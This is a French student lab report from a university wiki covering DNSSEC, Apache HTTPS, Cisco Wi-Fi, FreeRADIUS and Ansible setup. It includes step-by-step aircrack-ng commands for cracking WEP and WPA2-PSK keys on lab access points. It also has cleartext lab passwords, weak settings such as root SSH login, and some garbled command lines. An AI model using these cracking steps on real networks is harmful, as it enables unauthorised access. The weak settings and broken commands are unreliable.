&lt;br /&gt;
Lors du paramètrage, nous avons bien fait attention à rentrer &amp;quot;paixdieu.site&amp;quot; comme common name pour que le certificat soit validé par gandi.&lt;br /&gt;
Cela se fait en copant le contenu de paixdieu.site.csr dans la fenêtre correspondante lors de l'achat du certificat.&lt;br /&gt;
&lt;br /&gt;
Afin de bien sauvegarder les fichiers utilisés, nous les avvons sauvegarder dans le dossier suivant:&lt;br /&gt;
 ~/save_dns/paixdieu.site.csr&lt;br /&gt;
 ~/save_dns/paixdieu.site.key&lt;br /&gt;
&lt;br /&gt;
'''4.4 Sécurisation de serveur DNS par DNSSEC'''&lt;br /&gt;
&lt;br /&gt;
Activer DNSSEC&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.options on ajoute les lignes :&lt;br /&gt;
 dnssec-validation yes;&lt;br /&gt;
 dnssec-enable yes;&lt;br /&gt;
 dnssec-lookaside auto;&lt;br /&gt;
&lt;br /&gt;
On crée un répertoire /etc/bind/paixdieu.site.dnssed/&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZO'''4.4 Sécurisation de serveur DNS par DNSSEC'''NE paixdieu.site&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite, on crée la clé asymétrique de la zone pour signer les enregistrements :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.key paixdieu.site-ksk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.private paixdieu.site-ksk.private&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.key paixdieu.site-zsk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.private paixdieu.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
On les inclue à la suite de /etc/bind/db.paixdieu.site&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-ksk.key&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Puis incrémente le numéro de série (5=&amp;gt;6)&lt;br /&gt;
&lt;br /&gt;
On signe des enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o paixdieu.site -k paixdie'''4.4 Sécurisation de serveur DNS par DNSSEC'''u.site-ksk ../db.paixdieu.site paixdieu.site-zsk&lt;br /&gt;
&lt;br /&gt;
Prise en compte du fichier signé&lt;br /&gt;
  &lt;br /&gt;
On modifie le fichier /etc/bind/named.conf.local de la manière suivante :&lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/db.paixdieu.site.signed&amp;quot;;&lt;br /&gt;
	allow-transfer {217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Pour finir, nous allons sur gandi.net, sur notre nom de domaine dans DNSSEC et nous ajoutons les deux clefs (zsk et ksk avec l'algorithme 5 (RSA/SHA-1).&lt;br /&gt;
Et nous vérifions la bon fonctionnement du DNSSEC de la manière suivante :&lt;br /&gt;
 &amp;gt; dnssec-verify -o paixdieu.site db.paixdieu.site.signed&lt;br /&gt;
&lt;br /&gt;
 Loading zone 'paixdieu.site' from file 'db.paixdieu.site.signed'&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms:&lt;br /&gt;
 - RSASHA1&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
&lt;br /&gt;
'''4.3 Sécurisation de site web par certificat'''&lt;br /&gt;
&lt;br /&gt;
On active le module SSL&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure le port 443 pour l'HTTPS en remplaçant dans le fichier ''/etc/apache2/ports.conf'' :&lt;br /&gt;
 Listen 80&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
par&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
         Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On place paixdieu.site.key /etc/ssl/private/ et paixdieu.site.crt /etc/ssl/certs/&lt;br /&gt;
&lt;br /&gt;
On crée les liens symboliques pour les certificats&lt;br /&gt;
&lt;br /&gt;
 &amp;gt; c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
&lt;br /&gt;
On cofigure apache en ajoutant la ligne suivante dans le fichier /etc/apache2/apache2.conf :&lt;br /&gt;
 ServerName paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On crée le fichier de configuration custom /etc/apache2/sites-available/000-paixdieu.site-ssl.conf :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName paixdieu.site&lt;br /&gt;
        ServerAlias www.paixdieu.site&lt;br /&gt;
	ServerAdmin webmaster@localhost&lt;br /&gt;
        DocumentRoot /var/www/html &lt;br /&gt;
	Redirect permanent / https://paixdieu.site/&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
	ServerAdmin webmaster@localhost&lt;br /&gt;
	ServerName paixdieu.site&lt;br /&gt;
	ServerAlias www.paixdieu.site&lt;br /&gt;
	DocumentRoot /var/www/html&lt;br /&gt;
&lt;br /&gt;
	SSLEngine on&lt;br /&gt;
	SSLCertificateFile /etc/ssl/certs/paixdieu.site.crt&lt;br /&gt;
	SSLCertificateKeyFile /etc/ssl/private/paixdieu.site.key&lt;br /&gt;
	ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
	CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous activons le site ssl : &lt;br /&gt;
 a2ensite 000-paixdieu.site-ssl&lt;br /&gt;
&lt;br /&gt;
Nous arrivons bien à nous connecter à https://www.paixdieu.site&lt;br /&gt;
Et un test avec openssl nous renvoie le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 CONNECTED(00000003)&lt;br /&gt;
 Can't use SSL_get_servername&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify error:num=20:unable to get local issuer certificate&lt;br /&gt;
 verify return:1&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify error:num=21:unable to verify the first certificate&lt;br /&gt;
 verify return:1&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify return:1&lt;br /&gt;
 ---&lt;br /&gt;
 Certificate chain&lt;br /&gt;
 0 s:CN = paixdieu.site&lt;br /&gt;
   i:C = FR, ST = Paris, L = Paris, O = Gandi, CN = Gandi Standard SSL CA 2&lt;br /&gt;
 ---&lt;br /&gt;
 Server certificate&lt;br /&gt;
 -----BEGIN CERTIFICATE-----&lt;br /&gt;
 [...]&lt;br /&gt;
 -----END CERTIFICATE-----&lt;br /&gt;
 subject=CN = paixdieu.site&lt;br /&gt;
 issuer=C = FR, ST = Paris, L = Paris, O = Gandi, CN = Gandi Standard SSL CA 2&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
= Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
'''5.5  Intrusion sur un serveur d’application Web'''&lt;br /&gt;
[[Fichier:Wiki intrusion 5.5.zip]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom du point d'accès connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Sources : &lt;br /&gt;
- https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
- https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau006.html#sec29&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en root (mdp : Cisco si par défaut)&lt;br /&gt;
 conf t &lt;br /&gt;
 hostname wifi-ima5sc-e304 =&amp;gt; (optionnel) on donne un nom à notre point d'accès&lt;br /&gt;
 ip domain-name plil.info =&amp;gt; ajoute un nom de domaine (utilisé pour la création de certificats)&lt;br /&gt;
 &lt;br /&gt;
Activation du ssh :&lt;br /&gt;
 &lt;br /&gt;
 crypto key generate rsa general-keys modulus 2048 =&amp;gt; Génération clés publique/privée &lt;br /&gt;
 ip ssh version 2 =&amp;gt; Activation ssh&lt;br /&gt;
&lt;br /&gt;
Configuration de l'authentification sur le point d'accès :&lt;br /&gt;
&lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_marguerite group radius_marguerite&lt;br /&gt;
 radius-server host 193.48.57.177 auth-port 1812 acct-port 1813 key secret_marguerite&lt;br /&gt;
 aaa group server radius radius_marguerite&lt;br /&gt;
 server 193.48.57.177 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 dot11 ssid SSID_MARGUERITE&lt;br /&gt;
 vlan 11&lt;br /&gt;
  authentication open eap eap_marguerite&lt;br /&gt;
  authentication network-eap eap_marguerite&lt;br /&gt;
  authentication key-management wpa&lt;br /&gt;
  mbssid guest-mode&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Association du SSID à l'interface Wi-Fi :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
  encryption vlan 11 mode ciphers aes-ccm tkip&lt;br /&gt;
  ssid SSID_MARGUERITE&lt;br /&gt;
  mbssid&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration du Vlan 11 :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  no ip route-cache&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  bridge-group 11 subscriber-loop-control&lt;br /&gt;
  bridge-group 11 spanning-disabled&lt;br /&gt;
  bridge-group 11 block-unknown-source&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration interface filaire :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'IP du point d'accès et sa Gateway (n'est pas à faire par tous les groupes) :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
  ip default-gateway 10.1.0.2&lt;br /&gt;
  interface BVI 1&lt;br /&gt;
   ip address 10.1.0.4 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
'''Configuration du routeur en e304 :''' &lt;br /&gt;
&lt;br /&gt;
Configuration du VLAN1 :&lt;br /&gt;
  conf t&lt;br /&gt;
  interface vlan 1&lt;br /&gt;
   ip address 10.1.0.2 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Configuration du port sur lequel est branché l'AP en mode trunk : &lt;br /&gt;
&lt;br /&gt;
  conf t&lt;br /&gt;
  interface Gi4/2&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
   switchport trunk allowed vlan add 1&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
= Serveur FreeRadius =&lt;br /&gt;
&lt;br /&gt;
Installation de freeRADIUS&lt;br /&gt;
&lt;br /&gt;
 apt install freeradius&lt;br /&gt;
&lt;br /&gt;
On commence par configurer &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; à détailler&lt;br /&gt;
&lt;br /&gt;
 client marguerite {&lt;br /&gt;
 	ipaddr = 10.1.0.4/24&lt;br /&gt;
 	secret = secret_marguerite&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
ensuite &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 eap {&lt;br /&gt;
   [...]&lt;br /&gt;
   default_eap_type = peap&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
puis &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 root Cleartext-Password := &amp;quot;glopglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug &amp;lt;code&amp;gt;freeradius -X&amp;lt;/code&amp;gt; (après avoir au préalable stoppé le processus)&lt;br /&gt;
&lt;br /&gt;
= Ferme de serveurs Web =&lt;br /&gt;
&lt;br /&gt;
Installation VM xen :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/pra-07.cfg&lt;br /&gt;
&lt;br /&gt;
Configuration IP :&lt;br /&gt;
&lt;br /&gt;
Dans /etc/network/interfaces :&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.102&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Vérifier si on a bien la passerelle par défaut de configurer &lt;br /&gt;
&lt;br /&gt;
 ip r&lt;br /&gt;
&lt;br /&gt;
On peut pinger le routeur :&lt;br /&gt;
&lt;br /&gt;
 ping 172.26.154.254&lt;br /&gt;
&lt;br /&gt;
Mais pas les addresses ipv4 routée :&lt;br /&gt;
&lt;br /&gt;
 ping 8.8.8.8 échoue &lt;br /&gt;
&lt;br /&gt;
Redémarage service networking&lt;br /&gt;
&lt;br /&gt;
 service networking restart&lt;br /&gt;
&lt;br /&gt;
Si ça n'est pas suffisant :&lt;br /&gt;
&lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
 &lt;br /&gt;
Dans /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Redémarage service ssh&lt;br /&gt;
export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'une clé ssh sur la zabeth et ajout de cette clé dans les clés autorisées de la vm de pra :&lt;br /&gt;
&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;aviran.tetia@polytech-lille.net&amp;quot; -P &amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
On copie le contenu de la clé crée :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_ed25519.pub&lt;br /&gt;
&lt;br /&gt;
On colle son contenu dans les clé authorisées de la VM (fichier ~/.ssh/authorized_keys) :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/authorized_keys &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Correction de la source list de la VM pour pouvoir utiliser apt correctement :&lt;br /&gt;
&lt;br /&gt;
On remplace les deux dernières lignes par :&lt;br /&gt;
&lt;br /&gt;
 deb     http://security.debian.org/debian-security bullseye-security main contrib non-free&lt;br /&gt;
 deb-src http://security.debian.org/debian-security bullseye-security  main contrib non-free&lt;br /&gt;
 &lt;br /&gt;
Installation de python sur la VM :&lt;br /&gt;
&lt;br /&gt;
 apt update &lt;br /&gt;
 apt install python3&lt;br /&gt;
&lt;br /&gt;
Création d'un venv pour l'éxecution :&lt;br /&gt;
&lt;br /&gt;
 python3 -m venv ~/env-ansible&lt;br /&gt;
 . ~/env-ansible/bin/activate&lt;br /&gt;
 pip3 install -U setuptools wheel&lt;br /&gt;
 pip3 install -U ansible&lt;br /&gt;
&lt;br /&gt;
On crée l'arborescence suivante :&lt;br /&gt;
 &lt;br /&gt;
 └── roles&lt;br /&gt;
    ├── base&lt;br /&gt;
    │   ├── tasks&lt;br /&gt;
    │   │   └── main.yml&lt;br /&gt;
    │   └── templates&lt;br /&gt;
    │       ├── hostname.j2&lt;br /&gt;
    │       └── hosts.j2&lt;br /&gt;
    └── ssh_key&lt;br /&gt;
        ├── tasks&lt;br /&gt;
        │   └── main.yml&lt;br /&gt;
        └── templates&lt;br /&gt;
            └── keys.j2&lt;br /&gt;
&lt;br /&gt;
Dans main.yml :&lt;br /&gt;
 - name: &amp;quot;Setup sshkeys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: &amp;quot;0600&amp;quot;&lt;br /&gt;
&lt;br /&gt;
/!\ ne pas mettre de tabulation dans ce fichier, uniquement des espaces&lt;br /&gt;
&lt;br /&gt;
Dans keys.j2 :&lt;br /&gt;
  {% for item in ssh_keys %}&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;{{ item.key }}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
Ajout d'une clef dans les variables de groupe group_vars/all.yaml :&lt;br /&gt;
 &lt;br /&gt;
 ssh_keys:&lt;br /&gt;
  # if you don't install this i won't be able to get into your nodes to help you debug :)&lt;br /&gt;
  - name: tmaurice@thonkpad&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad&lt;br /&gt;
    # add more keys here&lt;br /&gt;
  - name: aviran.tetia@polytech-lille.net&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis lancer la commande :&lt;br /&gt;
&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;br /&gt;
&lt;br /&gt;
Vérification dans le fichier /root/.ssh/authorized_keys  :&lt;br /&gt;
 &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Nous obtenons bien toutes nos clefs ssh.&lt;br /&gt;
&lt;br /&gt;
Ajout des var d'environement pour pouvoir installer docker :&lt;br /&gt;
&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Installation du rôle Docker :&lt;br /&gt;
 &lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Puis dans polytech.yml :&lt;br /&gt;
&lt;br /&gt;
 - hosts: all&lt;br /&gt;
   roles:&lt;br /&gt;
    ...&lt;br /&gt;
    - geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après ré-execution du playbook, nous pouvons vérifier que Docker est bien installé : &lt;br /&gt;
&lt;br /&gt;
 docker -v &lt;br /&gt;
&lt;br /&gt;
Installation du Pare-feu :&lt;br /&gt;
&lt;br /&gt;
source : https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
&lt;br /&gt;
- création de roles/iptables/tasks/main.yml :&lt;br /&gt;
&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT tcp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: tcp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_tcp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT udp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: udp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_udp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Set the policy for the INPUT chain to DROP&lt;br /&gt;
  ansible.builtin.iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    policy: DROP&lt;br /&gt;
&lt;br /&gt;
- Cration du fichier de variables :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_tcp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8500&lt;br /&gt;
  - 8501&lt;br /&gt;
  - 8502&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 8300 &lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_udp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58074</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58074"/>
				<updated>2022-01-12T16:22:02Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* HTTPS / Certificat SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
